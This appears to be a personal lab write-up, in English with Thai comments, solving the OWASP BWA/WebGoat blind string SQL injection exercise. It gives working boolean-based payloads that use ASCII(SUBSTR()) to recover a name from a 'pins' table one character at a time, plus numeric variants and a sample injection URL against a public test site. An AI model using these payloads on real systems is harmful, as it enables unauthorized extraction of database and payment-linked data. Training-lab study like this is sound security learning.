OwaspBWA - Blind String SQL Injection

Injection Flaws - Blind String SQL Injection


The goal is to find the value of the
field : name in
table : pins
for the row with the cc_number of 4321432143214321.

*The field is of type varchar, which is a string.

  • Try Input single quote (')
Result = Unexpected end of command in statement
[SELECT * FROM user_data WHERE userid = ']

  • Try order by > 7   : return fail !   (Number of column is : 7)
  • But I try to use : Union Select is not work !

  • Try Input  : 101 and 1=1 : return true  <<< Vulnerability !
                             101 and 1=2 : return false



Injection Query
101 AND 1=((SELECT name FROM pins WHERE cc_number='4321432143214321')=String)
But Not work : เป็นไปไม่ได้ที่จะทำเช่นนี้  เราจึงต้องเช็คทีละอักษร


This Injection is work
&account_number=101 AND (SELECT ASCII(SUBSTR(name,1,1)) FROM pins WHERE cc_number=4321432143214321)=$--


Reference Ascii Values : 'A' = 65  'Z' = 90   |   'a' = 97 'z' = 122
String       : a-z A-Z
CharCode : Min = 65 / Max = 122


101 AND (SELECT ASCII(SUBSTR(name,0,1)) FROM pins WHERE cc_number=4321432143214321)=74--

101 AND (SELECT ASCII(SUBSTR(name,1,1)) FROM pins WHERE cc_number=4321432143214321)=105--

101 AND (SELECT ASCII(SUBSTR(name,2,1)) FROM pins WHERE cc_number=4321432143214321)=108--

101 AND (SELECT ASCII(SUBSTR(name,3,1)) FROM pins WHERE cc_number=4321432143214321)=108--


74 , 105 , 108 , 108  =  Jill





*note

Blind Numeric SQL Injection
101 AND 1=((SELECT ASCII(substr(pin,0,1)) 
FROM pins 
WHERE cc_number = '1111222233334444')=$)--+


Blind String SQL Injection
101 AND 1=(SELECT ASCII(substr(name,3,1)) 
FROM pins 
WHERE cc_number=4321432143214321)=$)--+


ในเคส Numeric อาจจะใช้อีกวิธีคือไล่จาก 1 -1000 หรือตาม range ที่กำหนด
ก็ไม่ต้องทำ Substr และเทียบ Ascii ให้ปวดหัว ....วนลูปกันยาวๆไป

101 AND 1=((SELECT pin
FROM pins WHERE cc_number ='1111222233334444')=$)--+


Example
สำหรับคนที่กำลังศึกษาแต่ยังไม่ได้ติดตั้ง OwaspBWA
ขอให้สนุกกับการ "ลองผิดลองถูก" เพื่อความเข้าใจ

http://webscantest.com/datastore/search_get_by_id.php?id=3+and+1=(select+ascii(substr(database(),1,1))=115)--+